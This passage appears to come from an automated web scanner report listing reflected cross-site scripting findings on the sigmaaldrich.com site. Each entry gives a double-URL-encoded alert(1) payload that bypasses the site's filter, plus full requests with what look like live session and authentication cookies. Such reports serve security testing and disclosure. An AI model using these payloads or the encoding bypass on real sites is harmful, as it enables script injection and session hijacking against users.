                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencec1223";alert(1)//822b16cc94e/functional-genomics-and-rnai/shrna-library-details.html","E404") ;
   </script>
...[SNIP]...

1.544. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna-library-details.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abddc%2522%253balert%25281%2529%252f%252f54e2a65fd2d was submitted in the REST URL parameter 2. This input was echoed as abddc";alert(1)//54e2a65fd2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnaiabddc%2522%253balert%25281%2529%252f%252f54e2a65fd2d/shrna-library-details.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnaiabddc";alert(1)//54e2a65fd2d/shrna-library-details.html","E404") ;
   </script>
...[SNIP]...

1.545. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna-library-details.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 494e6%2522%253balert%25281%2529%252f%252fcf8cd620e84 was submitted in the REST URL parameter 3. This input was echoed as 494e6";alert(1)//cf8cd620e84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnai/494e6%2522%253balert%25281%2529%252f%252fcf8cd620e84 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:42 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnai/494e6";alert(1)//cf8cd620e84","E404") ;
   </script>
...[SNIP]...

1.546. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37c26%2522%253balert%25281%2529%252f%252f892a908b416 was submitted in the REST URL parameter 1. This input was echoed as 37c26";alert(1)//892a908b416 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science37c26%2522%253balert%25281%2529%252f%252f892a908b416/functional-genomics-and-rnai/shrna/custom-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:41 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science37c26";alert(1)//892a908b416/functional-genomics-and-rnai/shrna/custom-services.html","E404") ;
   </script>
...[SNIP]...

1.547. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de110%2522%253balert%25281%2529%252f%252f4b474075c61 was submitted in the REST URL parameter 2. This input was echoed as de110";alert(1)//4b474075c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnaide110%2522%253balert%25281%2529%252f%252f4b474075c61/shrna/custom-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnaide110";alert(1)//4b474075c61/shrna/custom-services.html","E404") ;
   </script>
...[SNIP]...

1.548. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d2e%2522%253balert%25281%2529%252f%252ffebfb9718bc was submitted in the REST URL parameter 3. This input was echoed as 75d2e";alert(1)//febfb9718bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/functional-genomics-and-rnai/shrna75d2e%2522%253balert%25281%2529%252f%252ffebfb9718bc/custom-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/functional-genomics-and-rnai/shrna75d2e";alert(1)//febfb9718bc/custom-services.html","E404") ;
   </script>
...[SNIP]...

1.549. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna/custom-services.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna/custom-services.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8c45%2522%253balert%25281%2529%252f%252f7c853d125b2 was submitted in the REST URL parameter 4. This input was echoed as f8c45";alert(1)//7c853d125b2 in the application's response.

